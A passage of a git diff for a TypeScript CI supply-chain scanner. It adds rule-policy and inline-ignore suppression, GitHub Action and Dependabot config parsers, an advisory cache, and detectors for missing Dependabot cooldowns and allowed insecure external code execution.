+ return undefined; + } + return { + disable: incoming.disable, + ignore: incoming.ignore ? [...incoming.ignore] : undefined, + config: incoming.config ? { ...incoming.config } : undefined, + }; + } + + if (!incoming) { + return { + disable: current.disable, + ignore: current.ignore ? [...current.ignore] : undefined, + config: current.config ? { ...current.config } : undefined, + }; + } + + return { + disable: incoming.disable ?? current.disable, + ignore: unique([ + current.ignore as string[] | undefined, + incoming.ignore as string[] | undefined, + ]), + config: + current.config || incoming.config + ? { + ...(current.config ?? {}), + ...(incoming.config ?? {}), + } + : undefined, + }; +} + +function mergeRulePolicyMaps(...maps: Array): RulePolicyMap | undefined { + const merged: RulePolicyMap = {}; + + for (const map of maps) { + if (!map) { + continue; + } + for (const [ruleId, policy] of Object.entries(map)) { + merged[ruleId] = mergeRulePolicyConfig(merged[ruleId], policy) ?? merged[ruleId]; + } + } + + return Object.keys(merged).length > 0 ? merged : undefined; +} + +function normalizePersona(value: string | undefined): AuditPersona | undefined { + if (!value) { + return undefined; + } + return PERSONAS.find((persona) => persona === value) ?? undefined; +} + +function normalizeRuntimeMode(value: string | undefined): RuntimeMode | undefined { + if (!value) { + return undefined; + } + return RUNTIME_MODES.find((mode) => mode === value) ?? undefined; +} + function unique(values: Array): string[] { const merged = values.flatMap((entry) => entry ?? []); const seen = new Set(); @@ -353,6 +575,48 @@ export function resolveEffectiveConfig(options: ResolveConfigOptions): CodeGateC globalConfig.skip_rules, projectConfig.skip_rules, ]), + strict_collection: + pickFirst( + projectConfig.strict_collection, + globalConfig.strict_collection, + DEFAULT_CONFIG.strict_collection, + ) ?? DEFAULT_CONFIG.strict_collection, + scan_collection_modes: + pickFirst( + normalizeCollectionModes(projectConfig.scan_collection_modes), + normalizeCollectionModes(globalConfig.scan_collection_modes), + DEFAULT_CONFIG.scan_collection_modes, + ) ?? DEFAULT_CONFIG.scan_collection_modes, + scan_collection_kinds: + pickFirst( + normalizeCollectionKinds(projectConfig.scan_collection_kinds), + normalizeCollectionKinds(globalConfig.scan_collection_kinds), + ) ?? undefined, + rules: + mergeRulePolicyMaps( + normalizeRulePolicyMap(globalConfig.rules), + normalizeRulePolicyMap(projectConfig.rules), + ) ?? undefined, + persona: + pickFirst( + normalizePersona(projectConfig.persona), + normalizePersona(globalConfig.persona), + DEFAULT_CONFIG.persona, + ) ?? DEFAULT_CONFIG.persona, + runtime_mode: + pickFirst( + normalizeRuntimeMode(projectConfig.runtime_mode), + normalizeRuntimeMode(globalConfig.runtime_mode), + DEFAULT_CONFIG.runtime_mode, + ) ?? DEFAULT_CONFIG.runtime_mode, + workflow_audits: { + enabled: + pickFirst( + projectConfig.workflow_audits?.enabled, + globalConfig.workflow_audits?.enabled, + DEFAULT_CONFIG.workflow_audits?.enabled, + ) ?? false, + }, suppress_findings: unique([ DEFAULT_CONFIG.suppress_findings, globalConfig.suppress_findings, @@ -374,6 +638,7 @@ export function applyConfigPolicy(report: CodeGateReport, config: CodeGateConfig const findings = applySuppressionPolicy(report.findings, { suppress_findings: config.suppress_findings, suppression_rules: config.suppression_rules, + rule_policies: config.rules, }).map((finding) => ({ ...finding, owasp: config.owasp_mapping ? finding.owasp : [], diff --git a/src/config/inline-ignore.ts b/src/config/inline-ignore.ts new file mode 100644 index 0000000..51d26f3 --- /dev/null +++ b/src/config/inline-ignore.ts @@ -0,0 +1,83 @@ +import type { Finding } from "../types/finding.js"; + +export interface InlineIgnoreDirectiveSet { + rules: Set; + ruleLines: Map>; +} + +export type InlineIgnoreMap = Map; + +function normalizeRuleId(value: string): string | null { + const trimmed = value.trim(); + return trimmed.length > 0 ? trimmed : null; +} + +function addDirective(target: InlineIgnoreDirectiveSet, ruleId: string, line: number): void { + target.rules.add(ruleId); + + const lines = target.ruleLines.get(ruleId) ?? new Set(); + lines.add(line); + target.ruleLines.set(ruleId, lines); +} + +function parseDirectiveRules(raw: string): string[] { + return raw + .split(",") + .map((entry) => normalizeRuleId(entry)) + .filter((entry): entry is string => entry !== null); +} + +export function collectInlineIgnoreDirectives( + files: Array<{ filePath: string; textContent: string }>, +): InlineIgnoreMap { + const directives: InlineIgnoreMap = new Map(); + const pattern = /codegate:\s*ignore\[([^\]]+)\]/giu; + + for (const file of files) { + const lines = file.textContent.split(/\r?\n/u); + let directiveSet = directives.get(file.filePath); + + for (let index = 0; index < lines.length; index += 1) { + const line = lines[index] ?? ""; + pattern.lastIndex = 0; + + for (const match of line.matchAll(pattern)) { + const ruleIds = parseDirectiveRules(match[1] ?? ""); + if (ruleIds.length === 0) { + continue; + } + + if (!directiveSet) { + directiveSet = { + rules: new Set(), + ruleLines: new Map>(), + }; + directives.set(file.filePath, directiveSet); + } + + for (const ruleId of ruleIds) { + addDirective(directiveSet, ruleId, index + 1); + } + } + } + } + + return directives; +} + +export function applyInlineIgnoreDirectives( + findings: T[], + directives: InlineIgnoreMap, +): T[] { + return findings.map((finding) => { + const set = directives.get(finding.file_path); + if (!set || !set.rules.has(finding.rule_id)) { + return finding; + } + + return { + ...finding, + suppressed: true, + }; + }); +} diff --git a/src/config/suppression-policy.ts b/src/config/suppression-policy.ts index de9669a..a6bb40e 100644 --- a/src/config/suppression-policy.ts +++ b/src/config/suppression-policy.ts @@ -3,15 +3,25 @@ import type { Finding } from "../types/finding.js"; export interface SuppressionRule { rule_id?: string; file_path?: string; + location?: string; severity?: Finding["severity"]; category?: Finding["category"]; cwe?: string; fingerprint?: string; } +export interface RulePolicyConfig { + disable?: boolean; + ignore?: readonly string[]; + config?: Record; +} + +export type RulePolicyMap = Record; + export interface SuppressionPolicy { suppress_findings?: readonly string[]; suppression_rules?: readonly SuppressionRule[]; + rule_policies?: RulePolicyMap; } function normalizeString(value: string | undefined): string | undefined { @@ -63,6 +73,45 @@ function matchesGlob(value: string, glob: string): boolean { return globToRegExp(glob).test(value.replaceAll("\\", "/")); } +interface SuppressionLocation { + filePath: string; + line?: number; + column?: number; +} + +function parseSuppressionLocation(value: string): SuppressionLocation | null { + const trimmed = normalizeString(value); + if (!trimmed) { + return null; + } + + const pieces = trimmed.split(":"); + if (pieces.length === 0 || pieces.length > 3) { + return null; + } + + const [filePath, lineRaw, columnRaw] = pieces; + if (!filePath) { + return null; + } + + const line = lineRaw !== undefined ? Number.parseInt(lineRaw, 10) : undefined; + const column = columnRaw !== undefined ? Number.parseInt(columnRaw, 10) : undefined; + + if (lineRaw !== undefined && (!Number.isFinite(line) || (line ?? 0) < 1)) { + return null; + } + if (columnRaw !== undefined && (!Number.isFinite(column) || (column ?? 0) < 1)) { + return null; + } + + return { + filePath: filePath.replaceAll("\\", "/"), + line, + column, + }; +} + function matchesSuppressionRule(finding: Finding, rule: SuppressionRule): boolean { const ruleId = normalizeString(rule.rule_id); if (ruleId && finding.rule_id !== ruleId) { @@ -74,6 +123,26 @@ function matchesSuppressionRule(finding: Finding, rule: SuppressionRule): boolea return false; } + const location = parseSuppressionLocation(rule.location ?? ""); + if (location) { + const normalizedFindingPath = finding.file_path.replaceAll("\\", "/"); + if (normalizedFindingPath !== location.filePath) { + return false; + } + if ( + typeof location.line === "number" && + (typeof finding.location.line !== "number" || finding.location.line !== location.line) + ) { + return false; + } + if ( + typeof location.column === "number" && + (typeof finding.location.column !== "number" || finding.location.column !== location.column) + ) { + return false; + } + } + const severity = rule.severity; if (severity && finding.severity !== severity) { return false; @@ -97,6 +166,34 @@ function matchesSuppressionRule(finding: Finding, rule: SuppressionRule): boolea return true; } +function matchesRulePolicyIgnore(finding: Finding, location: string): boolean { + const parsed = parseSuppressionLocation(location); + if (!parsed) { + return false; + } + + const normalizedFindingPath = finding.file_path.replaceAll("\\", "/"); + if (normalizedFindingPath !== parsed.filePath) { + return false; + } + + if ( + typeof parsed.line === "number" && + (typeof finding.location.line !== "number" || finding.location.line !== parsed.line) + ) { + return false; + } + + if ( + typeof parsed.column === "number" && + (typeof finding.location.column !== "number" || finding.location.column !== parsed.column) + ) { + return false; + } + + return true; +} + export function applySuppressionPolicy( findings: T[], policy: SuppressionPolicy, @@ -107,14 +204,19 @@ export function applySuppressionPolicy( .filter((findingId): findingId is string => findingId !== undefined), ); const rules = policy.suppression_rules ?? []; + const rulePolicies = policy.rule_policies ?? {}; return findings.map((finding) => { const ruleMatch = rules.some((rule) => matchesSuppressionRule(finding, rule)); const legacyMatch = legacySuppressions.has(finding.finding_id); + const rulePolicy = rulePolicies[finding.rule_id]; + const ruleDisabled = rulePolicy?.disable === true; + const ruleIgnoreMatch = + rulePolicy?.ignore?.some((location) => matchesRulePolicyIgnore(finding, location)) ?? false; return { ...finding, - suppressed: finding.suppressed || legacyMatch || ruleMatch, + suppressed: finding.suppressed || legacyMatch || ruleMatch || ruleDisabled || ruleIgnoreMatch, }; }); } diff --git a/src/layer2-static/action/parser.ts b/src/layer2-static/action/parser.ts new file mode 100644 index 0000000..f988c4a --- /dev/null +++ b/src/layer2-static/action/parser.ts @@ -0,0 +1,213 @@ +import type { + ActionFacts, + ActionInputFacts, + ActionOutputFacts, + ActionRunsFacts, + ActionStepFacts, +} from "./types.js"; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function asString(value: unknown): string | undefined { + return typeof value === "string" ? value : undefined; +} + +function asBoolean(value: unknown): boolean | undefined { + return typeof value === "boolean" ? value : undefined; +} + +function asStringRecord(value: unknown): Record | undefined { + const record = asRecord(value); + if (!record) { + return undefined; + } + + const result: Record = {}; + for (const [key, entry] of Object.entries(record)) { + if (typeof entry === "string") { + result[key] = entry; + } + } + + return Object.keys(result).length > 0 ? result : undefined; +} + +function asStringArray(value: unknown): string[] | undefined { + if (!Array.isArray(value)) { + return undefined; + } + + const result = value.filter((entry): entry is string => typeof entry === "string"); + return result.length > 0 ? result : undefined; +} + +function normalizeActionPath(value: string): string { + return value.replaceAll("\\", "/"); +} + +export function isGitHubActionPath(path: string): boolean { + return /(?:^|\/)action\.ya?ml$/iu.test(normalizeActionPath(path)); +} + +function extractStepFacts(step: unknown): ActionStepFacts | null { + const stepRecord = asRecord(step); + if (!stepRecord) { + return null; + } + + const withEntries = asStringRecord(stepRecord.with); + const envEntries = asStringRecord(stepRecord.env); + const stepFacts: ActionStepFacts = { + id: asString(stepRecord.id), + name: asString(stepRecord.name), + uses: asString(stepRecord.uses), + run: asString(stepRecord.run), + if: asString(stepRecord.if), + shell: asString(stepRecord.shell), + workingDirectory: + asString(stepRecord["working-directory"]) ?? asString(stepRecord.workingDirectory), + with: withEntries, + env: envEntries, + }; + + if (!stepFacts.uses && !stepFacts.run) { + return null; + } + + return stepFacts; +} + +function extractInputs(value: unknown): Record | undefined { + const inputs = asRecord(value); + if (!inputs) { + return undefined; + } + + const result: Record = {}; + for (const [name, inputValue] of Object.entries(inputs)) { + const inputRecord = asRecord(inputValue); + if (!inputRecord) { + continue; + } + + const entry: ActionInputFacts = { + description: asString(inputRecord.description), + required: asBoolean(inputRecord.required), + default: asString(inputRecord.default), + deprecationMessage: + asString(inputRecord.deprecationMessage) ?? asString(inputRecord.deprecation_message), + }; + + if ( + entry.description !== undefined || + entry.required !== undefined || + entry.default !== undefined || + entry.deprecationMessage !== undefined + ) { + result[name] = entry; + } + } + + return Object.keys(result).length > 0 ? result : undefined; +} + +function extractOutputs(value: unknown): Record | undefined { + const outputs = asRecord(value); + if (!outputs) { + return undefined; + } + + const result: Record = {}; + for (const [name, outputValue] of Object.entries(outputs)) { + const outputRecord = asRecord(outputValue); + if (!outputRecord) { + continue; + } + + const entry: ActionOutputFacts = { + description: asString(outputRecord.description), + value: asString(outputRecord.value), + }; + + if (entry.description !== undefined || entry.value !== undefined) { + result[name] = entry; + } + } + + return Object.keys(result).length > 0 ? result : undefined; +} + +function extractRuns(value: unknown): ActionRunsFacts | undefined { + const runs = asRecord(value); + if (!runs) { + return undefined; + } + + const stepsRaw = Array.isArray(runs.steps) ? runs.steps : []; + const steps = stepsRaw + .map((step) => extractStepFacts(step)) + .filter((step): step is ActionStepFacts => step !== null); + + const result: ActionRunsFacts = { + using: asString(runs.using), + main: asString(runs.main), + pre: asString(runs.pre), + post: asString(runs.post), + image: asString(runs.image), + args: asStringArray(runs.args), + steps: steps.length > 0 ? steps : undefined, + }; + + if ( + result.using === undefined && + result.main === undefined && + result.pre === undefined && + result.post === undefined && + result.image === undefined && + result.args === undefined && + result.steps === undefined + ) { + return undefined; + } + + return result; +} + +export function extractActionFacts(parsed: unknown): ActionFacts | null { + const root = asRecord(parsed); + if (!root) { + return null; + } + + const runs = extractRuns(root.runs); + const inputs = extractInputs(root.inputs); + const outputs = extractOutputs(root.outputs); + const branding = asRecord(root.branding) ?? undefined; + + if ( + runs === undefined && + inputs === undefined && + outputs === undefined && + branding === undefined && + asString(root.name) === undefined && + asString(root.description) === undefined && + asString(root.author) === undefined + ) { + return null; + } + + return { + name: asString(root.name), + description: asString(root.description), + author: asString(root.author), + branding, + inputs, + outputs, + runs, + }; +} diff --git a/src/layer2-static/action/types.ts b/src/layer2-static/action/types.ts new file mode 100644 index 0000000..774f033 --- /dev/null +++ b/src/layer2-static/action/types.ts @@ -0,0 +1,43 @@ +export interface ActionStepFacts { + id?: string; + name?: string; + uses?: string; + run?: string; + if?: string; + shell?: string; + workingDirectory?: string; + with?: Record; + env?: Record; +} + +export interface ActionRunsFacts { + using?: string; + main?: string; + pre?: string; + post?: string; + image?: string; + args?: string[]; + steps?: ActionStepFacts[]; +} + +export interface ActionInputFacts { + description?: string; + required?: boolean; + default?: string; + deprecationMessage?: string; +} + +export interface ActionOutputFacts { + description?: string; + value?: string; +} + +export interface ActionFacts { + name?: string; + description?: string; + author?: string; + branding?: Record; + inputs?: Record; + outputs?: Record; + runs?: ActionRunsFacts; +} diff --git a/src/layer2-static/advisories/cache.ts b/src/layer2-static/advisories/cache.ts new file mode 100644 index 0000000..a171a3a --- /dev/null +++ b/src/layer2-static/advisories/cache.ts @@ -0,0 +1,62 @@ +import { existsSync, mkdirSync, readFileSync, writeFileSync } from "node:fs"; +import { join } from "node:path"; + +export interface AdvisoryPayload { + generatedAt: number; + advisories: Record; +} + +const CACHE_FILE = "gha-advisories.json"; + +function isRecord(value: unknown): value is Record { + return typeof value === "object" && value !== null && !Array.isArray(value); +} + +function isAdvisoryPayload(value: unknown): value is AdvisoryPayload { + if (!isRecord(value)) { + return false; + } + if (typeof value.generatedAt !== "number") { + return false; + } + if (!isRecord(value.advisories)) { + return false; + } + + return Object.values(value.advisories).every( + (entry) => Array.isArray(entry) && entry.every((item) => typeof item === "string"), + ); +} + +function cachePath(cacheDir: string): string { + return join(cacheDir, CACHE_FILE); +} + +export function loadCachedAdvisoryPayload( + cacheDir: string, + maxAgeMs: number, + now = Date.now(), +): AdvisoryPayload | null { + const path = cachePath(cacheDir); + if (!existsSync(path)) { + return null; + } + + try { + const parsed = JSON.parse(readFileSync(path, "utf8")) as unknown; + if (!isAdvisoryPayload(parsed)) { + return null; + } + if (now - parsed.generatedAt > maxAgeMs) { + return null; + } + return parsed; + } catch { + return null; + } +} + +export function saveCachedAdvisoryPayload(cacheDir: string, payload: AdvisoryPayload): void { + mkdirSync(cacheDir, { recursive: true }); + writeFileSync(cachePath(cacheDir), JSON.stringify(payload, null, 2), "utf8"); +} diff --git a/src/layer2-static/advisories/gha-advisory-client.ts b/src/layer2-static/advisories/gha-advisory-client.ts new file mode 100644 index 0000000..c3d9361 --- /dev/null +++ b/src/layer2-static/advisories/gha-advisory-client.ts @@ -0,0 +1,13 @@ +import type { RuntimeMode } from "../../config.js"; +import { loadBundledGithubAdvisories, type GithubMetadataClientOptions } from "../github/client.js"; +import type { AdvisoryPayload } from "../github/cache.js"; + +export interface LoadKnownVulnerableActionsOptions extends GithubMetadataClientOptions { + runtimeMode?: RuntimeMode; +} + +export function loadKnownVulnerableActions( + options: LoadKnownVulnerableActionsOptions = {}, +): AdvisoryPayload { + return loadBundledGithubAdvisories(options); +} diff --git a/src/layer2-static/advisories/gha-known-vulnerable-actions.json b/src/layer2-static/advisories/gha-known-vulnerable-actions.json new file mode 100644 index 0000000..2498a45 --- /dev/null +++ b/src/layer2-static/advisories/gha-known-vulnerable-actions.json @@ -0,0 +1,4 @@ +{ + "actions/checkout": ["v3"], + "tj-actions/changed-files": ["v39"] +} diff --git a/src/layer2-static/audits/registry.ts b/src/layer2-static/audits/registry.ts new file mode 100644 index 0000000..c2e8479 --- /dev/null +++ b/src/layer2-static/audits/registry.ts @@ -0,0 +1,53 @@ +import type { AuditPersona } from "../../config.js"; +import type { AuditSelectionContext, RegisteredAudit } from "./types.js"; + +const PERSONA_ORDER: Record = { + regular: 0, + pedantic: 1, + auditor: 2, +}; + +interface AuditSelectionContextWithDisable extends AuditSelectionContext { + disabledAuditIds?: readonly string[]; +} + +function resolvePersona(input: AuditSelectionContext): AuditPersona { + return input.persona ?? "regular"; +} + +function isPersonaAllowed(required: AuditPersona | undefined, current: AuditPersona): boolean { + const requiredPersona = required ?? "regular"; + return PERSONA_ORDER[current] >= PERSONA_ORDER[requiredPersona]; +} + +function isRuntimeAllowed( + onlineRequired: boolean | undefined, + context: AuditSelectionContext, +): boolean { + if (!onlineRequired) { + return true; + } + + const mode = context.runtimeMode ?? "offline"; + return mode === "online"; +} + +function isAuditDisabled(auditId: string, context: AuditSelectionContext): boolean { + const disabledAuditIds = (context as AuditSelectionContextWithDisable).disabledAuditIds; + return (disabledAuditIds ?? []).includes(auditId); +} + +export function filterRegisteredAudits( + audits: Array>, + context: AuditSelectionContext, +): Array> { + const persona = resolvePersona(context); + return audits.filter( + (audit) => + !isAuditDisabled(audit.id, context) && + isPersonaAllowed(audit.minPersona, persona) && + isRuntimeAllowed(audit.onlineRequired, context), + ); +} + +export type { RegisteredAudit } from "./types.js"; diff --git a/src/layer2-static/audits/types.ts b/src/layer2-static/audits/types.ts new file mode 100644 index 0000000..f4aa96c --- /dev/null +++ b/src/layer2-static/audits/types.ts @@ -0,0 +1,14 @@ +import type { AuditPersona, RuntimeMode } from "../../config.js"; +import type { Finding } from "../../types/finding.js"; + +export interface AuditSelectionContext { + persona?: AuditPersona; + runtimeMode?: RuntimeMode; +} + +export interface RegisteredAudit { + id: string; + run: (context: TContext) => Finding[] | Promise; + minPersona?: AuditPersona; + onlineRequired?: boolean; +} diff --git a/src/layer2-static/dependabot/parser.ts b/src/layer2-static/dependabot/parser.ts new file mode 100644 index 0000000..e791749 --- /dev/null +++ b/src/layer2-static/dependabot/parser.ts @@ -0,0 +1,242 @@ +import type { + DependabotCommitMessageFacts, + DependabotCooldownFacts, + DependabotFacts, + DependabotGroupFacts, + DependabotRuleFacts, + DependabotScheduleFacts, + DependabotUpdateFacts, +} from "./types.js"; + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function asString(value: unknown): string | undefined { + return typeof value === "string" ? value : undefined; +} + +function asNumber(value: unknown): number | undefined { + return typeof value === "number" && Number.isFinite(value) ? value : undefined; +} + +function asBoolean(value: unknown): boolean | undefined { + return typeof value === "boolean" ? value : undefined; +} + +function asStringArray(value: unknown): string[] | undefined { + if (!Array.isArray(value)) { + return undefined; + } + + const result = value.filter((entry): entry is string => typeof entry === "string"); + return result.length > 0 ? result : undefined; +} + +function normalizeDependabotPath(value: string): string { + return value.replaceAll("\\", "/"); +} + +export function isGitHubDependabotPath(path: string): boolean { + return /(?:^|\/)\.github\/dependabot\.ya?ml$/iu.test(normalizeDependabotPath(path)); +} + +function extractSchedule(value: unknown): DependabotScheduleFacts | undefined { + const schedule = asRecord(value); + if (!schedule) { + return undefined; + } + + const result: DependabotScheduleFacts = { + interval: asString(schedule.interval), + day: asString(schedule.day), + time: asString(schedule.time), + timezone: asString(schedule.timezone), + }; + + return result.interval || result.day || result.time || result.timezone ? result : undefined; +} + +function extractCooldown(value: unknown): DependabotCooldownFacts | undefined { + const cooldown = asRecord(value); + if (!cooldown) { + return undefined; + } + + const result: DependabotCooldownFacts = { + defaultDays: asNumber(cooldown["default-days"]), + semverMajorDays: asNumber(cooldown["semver-major-days"]), + semverMinorDays: asNumber(cooldown["semver-minor-days"]), + semverPatchDays: asNumber(cooldown["semver-patch-days"]), + }; + + return result.defaultDays !== undefined || + result.semverMajorDays !== undefined || + result.semverMinorDays !== undefined || + result.semverPatchDays !== undefined + ? result + : undefined; +} + +function extractCommitMessage(value: unknown): DependabotCommitMessageFacts | undefined { + const commitMessage = asRecord(value); + if (!commitMessage) { + return undefined; + } + + const result: DependabotCommitMessageFacts = { + prefix: asString(commitMessage.prefix), + prefixDevelopment: + asString(commitMessage["prefix-development"]) ?? asString(commitMessage.prefixDevelopment), + include: asString(commitMessage.include), + }; + + return result.prefix || result.prefixDevelopment || result.include ? result : undefined; +} + +function extractRuleFacts(value: unknown): DependabotRuleFacts | null { + const rule = asRecord(value); + if (!rule) { + return null; + } + + const result: DependabotRuleFacts = { + dependencyName: asString(rule["dependency-name"]) ?? asString(rule.dependencyName), + dependencyType: asString(rule["dependency-type"]) ?? asString(rule.dependencyType), + versions: asStringArray(rule.versions), + updateTypes: asStringArray(rule["update-types"]) ?? asStringArray(rule.updateTypes), + patterns: asStringArray(rule.patterns), + }; + + if ( + result.dependencyName !== undefined || + result.dependencyType !== undefined || + result.versions !== undefined || + result.updateTypes !== undefined || + result.patterns !== undefined + ) { + return result; + } + + return null; +} + +function extractGroupFacts(value: unknown): DependabotGroupFacts | null { + const group = asRecord(value); + if (!group) { + return null; + } + + const result: DependabotGroupFacts = { + dependencyType: asString(group["dependency-type"]) ?? asString(group.dependencyType), + updateTypes: asStringArray(group["update-types"]) ?? asStringArray(group.updateTypes), + patterns: asStringArray(group.patterns), + }; + + if ( + result.dependencyType !== undefined || + result.updateTypes !== undefined || + result.patterns !== undefined + ) { + return result; + } + + return null; +} + +function extractUpdateFacts(value: unknown): DependabotUpdateFacts | null { + const update = asRecord(value); + if (!update) { + return null; + } + + const allow = Array.isArray(update.allow) + ? update.allow + .map((entry) => extractRuleFacts(entry)) + .filter((entry): entry is DependabotRuleFacts => entry !== null) + : undefined; + const ignore = Array.isArray(update.ignore) + ? update.ignore + .map((entry) => extractRuleFacts(entry)) + .filter((entry): entry is DependabotRuleFacts => entry !== null) + : undefined; + + const groupsRecord = asRecord(update.groups); + const groups: Record = {}; + if (groupsRecord) { + for (const [name, groupValue] of Object.entries(groupsRecord)) { + const groupFacts = extractGroupFacts(groupValue); + if (groupFacts) { + groups[name] = groupFacts; + } + } + } + + const result: DependabotUpdateFacts = { + packageEcosystem: asString(update["package-ecosystem"]) ?? asString(update.packageEcosystem), + directory: asString(update.directory), + targetBranch: asString(update["target-branch"]) ?? asString(update.targetBranch), + openPullRequestsLimit: + asNumber(update["open-pull-requests-limit"]) ?? asNumber(update.openPullRequestsLimit), + insecureExternalCodeExecution: + asBoolean(update["insecure-external-code-execution"]) ?? + asBoolean(update.insecureExternalCodeExecution), + schedule: extractSchedule(update.schedule), + cooldown: extractCooldown(update.cooldown), + labels: asStringArray(update.labels), + assignees: asStringArray(update.assignees), + reviewers: asStringArray(update.reviewers), + registries: asStringArray(update.registries), + commitMessage: extractCommitMessage(update["commit-message"] ?? update.commitMessage), + allow, + ignore, + groups: Object.keys(groups).length > 0 ? groups : undefined, + }; + + if ( + result.packageEcosystem !== undefined || + result.directory !== undefined || + result.targetBranch !== undefined || + result.openPullRequestsLimit !== undefined || + result.insecureExternalCodeExecution !== undefined || + result.schedule !== undefined || + result.cooldown !== undefined || + result.labels !== undefined || + result.assignees !== undefined || + result.reviewers !== undefined || + result.registries !== undefined || + result.commitMessage !== undefined || + result.allow !== undefined || + result.ignore !== undefined || + result.groups !== undefined + ) { + return result; + } + + return null; +} + +export function extractDependabotFacts(parsed: unknown): DependabotFacts | null { + const root = asRecord(parsed); + if (!root) { + return null; + } + + const version = asNumber(root.version); + const updatesRaw = Array.isArray(root.updates) ? root.updates : []; + const updates = updatesRaw + .map((entry) => extractUpdateFacts(entry)) + .filter((entry): entry is DependabotUpdateFacts => entry !== null); + + if (version === undefined && updates.length === 0) { + return null; + } + + return { + version, + updates, + }; +} diff --git a/src/layer2-static/dependabot/types.ts b/src/layer2-static/dependabot/types.ts new file mode 100644 index 0000000..7eb4523 --- /dev/null +++ b/src/layer2-static/dependabot/types.ts @@ -0,0 +1,56 @@ +export interface DependabotScheduleFacts { + interval?: string; + day?: string; + time?: string; + timezone?: string; +} + +export interface DependabotCooldownFacts { + defaultDays?: number; + semverMajorDays?: number; + semverMinorDays?: number; + semverPatchDays?: number; +} + +export interface DependabotCommitMessageFacts { + prefix?: string; + prefixDevelopment?: string; + include?: string; +} + +export interface DependabotRuleFacts { + dependencyName?: string; + dependencyType?: string; + versions?: string[]; + updateTypes?: string[]; + patterns?: string[]; +} + +export interface DependabotGroupFacts { + dependencyType?: string; + updateTypes?: string[]; + patterns?: string[]; +} + +export interface DependabotUpdateFacts { + packageEcosystem?: string; + directory?: string; + targetBranch?: string; + openPullRequestsLimit?: number; + insecureExternalCodeExecution?: boolean; + schedule?: DependabotScheduleFacts; + cooldown?: DependabotCooldownFacts; + labels?: string[]; + assignees?: string[]; + reviewers?: string[]; + registries?: string[]; + commitMessage?: DependabotCommitMessageFacts; + allow?: DependabotRuleFacts[]; + ignore?: DependabotRuleFacts[]; + groups?: Record; +} + +export interface DependabotFacts { + version?: number; + updates: DependabotUpdateFacts[]; +} diff --git a/src/layer2-static/detectors/dependabot-cooldown.ts b/src/layer2-static/detectors/dependabot-cooldown.ts new file mode 100644 index 0000000..e34b440 --- /dev/null +++ b/src/layer2-static/detectors/dependabot-cooldown.ts @@ -0,0 +1,80 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { extractDependabotFacts, isGitHubDependabotPath } from "../dependabot/parser.js"; + +export interface DependabotCooldownInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function hasCooldown(update: { + cooldown?: { + defaultDays?: number; + semverMajorDays?: number; + semverMinorDays?: number; + semverPatchDays?: number; + }; +}): boolean { + const cooldown = update.cooldown; + if (!cooldown) { + return false; + } + + return ( + typeof cooldown.defaultDays === "number" || + typeof cooldown.semverMajorDays === "number" || + typeof cooldown.semverMinorDays === "number" || + typeof cooldown.semverPatchDays === "number" + ); +} + +export function detectDependabotCooldown(input: DependabotCooldownInput): Finding[] { + if (!isGitHubDependabotPath(input.filePath)) { + return []; + } + + const facts = extractDependabotFacts(input.parsed); + if (!facts || facts.updates.length === 0) { + return []; + } + + const findings: Finding[] = []; + + facts.updates.forEach((update, index) => { + if (!update.schedule || hasCooldown(update)) { + return; + } + + const ecosystem = update.packageEcosystem ?? "unknown-ecosystem"; + const directory = update.directory ?? "/"; + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ecosystem, directory, "schedule", "cooldown"], + fallbackValue: `${ecosystem} ${directory} update rule has no cooldown`, + }); + + findings.push({ + rule_id: "dependabot-cooldown", + finding_id: `DEPENDABOT_COOLDOWN-${input.filePath}-${index}`, + severity: "LOW", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `updates[${index}].cooldown` }, + description: + "Dependabot update rule has no cooldown window, increasing update churn and review pressure", + affected_tools: ["dependabot"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-400", + confidence: "MEDIUM", + fixable: false, + remediation_actions: ["Add cooldown settings to pace update volume and review load"], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/dependabot-execution.ts b/src/layer2-static/detectors/dependabot-execution.ts new file mode 100644 index 0000000..a62bfda --- /dev/null +++ b/src/layer2-static/detectors/dependabot-execution.ts @@ -0,0 +1,86 @@ +import { buildFindingEvidence } from "../evidence.js"; +import type { Finding } from "../../types/finding.js"; +import { isGitHubDependabotPath } from "../dependabot/parser.js"; + +export interface DependabotExecutionInput { + filePath: string; + parsed: unknown; + textContent: string; +} + +function asRecord(value: unknown): Record | null { + if (!value || typeof value !== "object" || Array.isArray(value)) { + return null; + } + return value as Record; +} + +function isExternalCodeExecutionAllowed(value: unknown): boolean { + if (value === true) { + return true; + } + if (typeof value === "string") { + const normalized = value.trim().toLowerCase(); + return normalized === "allow" || normalized === "true"; + } + return false; +} + +export function detectDependabotExecution(input: DependabotExecutionInput): Finding[] { + if (!isGitHubDependabotPath(input.filePath)) { + return []; + } + + const root = asRecord(input.parsed); + const updates = Array.isArray(root?.updates) ? root.updates : []; + if (updates.length === 0) { + return []; + } + + const findings: Finding[] = []; + + updates.forEach((entry, index) => { + const update = asRecord(entry); + if (!update) { + return; + } + + if (!isExternalCodeExecutionAllowed(update["insecure-external-code-execution"])) { + return; + } + + const ecosystem = + typeof update["package-ecosystem"] === "string" + ? update["package-ecosystem"] + : "unknown-ecosystem"; + const evidence = buildFindingEvidence({ + textContent: input.textContent, + searchTerms: [ecosystem, "insecure-external-code-execution", "allow"], + fallbackValue: `${ecosystem} enables insecure external code execution`, + }); + + findings.push({ + rule_id: "dependabot-execution", + finding_id: `DEPENDABOT_EXECUTION-${input.filePath}-${index}`, + severity: "HIGH", + category: "CI_SUPPLY_CHAIN", + layer: "L2", + file_path: input.filePath, + location: { field: `updates[${index}].insecure-external-code-execution` }, + description: "Dependabot update rule allows insecure external code execution", + affected_tools: ["dependabot"], + cve: null, + owasp: ["ASI02"], + cwe: "CWE-94", + confidence: "HIGH", + fixable: false, + remediation_actions: [ + "Remove insecure-external-code-execution allowances and isolate registries through trusted credentials", + ], + evidence: evidence?.evidence ?? null, + suppressed: false, + }); + }); + + return findings; +} diff --git a/src/layer2-static/detectors/workflow-anonymous-definition.ts 